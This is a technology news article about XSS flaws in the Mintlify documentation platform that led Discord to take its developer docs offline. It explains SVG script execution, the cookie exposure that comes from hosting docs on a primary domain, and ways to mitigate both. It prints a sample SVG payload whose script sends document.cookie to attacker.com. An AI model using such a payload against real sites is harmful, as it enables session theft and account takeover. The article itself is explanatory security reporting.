By ByteBot
Discord shut down its entire developer documentation for two hours on November 7, 2025, after a 16-year-old security researcher discovered critical cross-site scripting (XSS) vulnerabilities in Mintlify, an AI-powered documentation platform used by hundreds of companies including X (Twitter), Vercel, and Cursor. The vulnerabilities, patched on November 15, 2025, allowed attackers to steal user credentials with a single malicious link by exploiting an unsecured endpoint that served SVG files containing embedded JavaScript across different customers’ domains.
How SVG Files Became the Attack Vector
Researcher Daniel discovered Mintlify’s /_mintlify/_static/[subdomain]/[...route] endpoint lacked origin validation, allowing him to fetch any customer’s static files. While HTML and JavaScript files were filtered, SVG files bypassed protections entirely. This is a common security pitfall: developers treat SVG files as “just images” when they’re actually XML-based documents that can contain executable <script> tags.
The proof-of-concept URL demonstrated the vulnerability: https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lmao.svg. When opened directly in a browser, the SVG file executed JavaScript with full access to Discord’s cookies and session tokens. An attacker could embed a simple payload like this:
<svg xmlns="http://www.w3.org/2000/svg">
<script>
fetch('https://attacker.com/steal?cookies=' + document.cookie);
</script>
</svg>Similar SVG XSS vulnerabilities were discovered in Angular (CVE-2025-66412) and Plane (CVE-2025-21616) in 2025, proving this attack vector remains underestimated by developers and platforms alike.
Primary Domain Hosting Amplified the Damage
The real risk came from how companies hosted their documentation. Discord, X, Vercel, and Cursor all hosted Mintlify-powered docs on their primary domains (discord.com/developers, x.com/docs) rather than subdomains. This meant XSS vulnerabilities on documentation pages gained access to authentication cookies for the entire domain.
Browser same-origin policy treats all pages on company.com/* as having access to the same cookies. XSS on discord.com/developers/... can steal session tokens for discord.com itself. If Discord had hosted docs on docs.discord.com instead, the XSS would only access that subdomain’s cookies—not the main Discord session.
Discord’s response made the stakes clear: shut down all developer documentation for two hours, investigate the vulnerability, then permanently revert to their previous documentation platform. Primary domain hosting turned a documentation platform bug into an existential security risk.
One Vulnerability, Hundreds of Affected Companies
This incident exemplifies supply chain attacks: one vulnerability in Mintlify simultaneously exposed hundreds of companies to account takeover attacks. Four CVEs were assigned—CVE-2025-67842 (static asset injection), CVE-2025-67844 (GitHub metadata exposure), CVE-2025-67845 (path traversal), and CVE-2025-67846 (deployment infrastructure vulnerability)—all patched November 15, 2025.
As researcher Daniel noted, “compromising a single supply chain can lead to a multitude of problems.” The researchers collectively received $11,000 in bug bounties ($4,000 from Discord, ~$7,000 from Mintlify). That amount seems low for a vulnerability affecting hundreds of organizations—supply chain bugs are systematically undervalued by current bug bounty economics.
Related: React2Shell: CVSS 10.0 RCE Hits Next.js in 30 Hours
Trust Broken Despite 8-Day Patch
Mintlify’s response was industry-leading: vulnerabilities discovered November 7, all CVEs patched November 15 (8-day turnaround). Researchers coordinated with Mintlify and affected companies via Slack channels for rapid remediation. Yet Discord still permanently abandoned the platform.
This demonstrates that supply chain trust is a one-way door. Once broken, even perfect remediation can’t restore it. Companies should ask themselves: “What happens if our critical third-party platform is compromised tomorrow? Can we migrate quickly?” Discord’s ability to rollback saved them. Organizations without rollback plans face much uglier choices.
Part of Broader 2025 Developer Tool Security Crisis
The Mintlify vulnerability joins an accelerating trend of supply chain attacks targeting developer tooling. According to ReversingLabs’ 2025 Software Supply Chain Security Report, attacks doubled from 13 per month (early 2024-March 2025) to 26 per month (April-December 2025). Notable 2025 incidents include the Nx npm token theft (6,700+ repositories leaked) and the GlassWorm VS Code marketplace attack.
OWASP elevated “Software Supply Chain Failures” to #3 in the Top 10:2025 security risks, reflecting growing recognition that third-party dependencies and platforms represent critical attack surfaces. Documentation platforms now join npm packages, VS Code extensions, AI coding assistants, and CI/CD pipelines as targets. Developers trust these tools implicitly, making them attractive for attackers.
Related: AI Coding Tools Hit by Security Exploits: What Devs Need
Key Takeaways
- Subdomain isolation is critical – Hosting documentation on
docs.company.cominstead ofcompany.com/docslimits XSS impact to the subdomain only, preventing attackers from accessing primary domain session tokens - SVG files are executable content, not images – Platforms must filter or convert SVG files to raster formats (PNG/JPG) to prevent embedded JavaScript execution; treating SVGs as “safe images” is a security mistake
- Supply chain trust doesn’t recover from breaches – Mintlify’s 8-day patch turnaround was industry-leading, yet Discord permanently abandoned the platform; once trust breaks, customers leave regardless of remediation speed
- Bug bounties undervalue supply chain vulnerabilities – $11,000 for a bug affecting hundreds of companies demonstrates current programs focus on single-company impact, missing the multiplicative effect of supply chain compromises
- Developer tool attacks are accelerating – Supply chain attacks doubled to 26/month in 2025, with documentation platforms joining npm, VS Code extensions, and AI coding tools as high-risk attack surfaces requiring continuous security monitoring
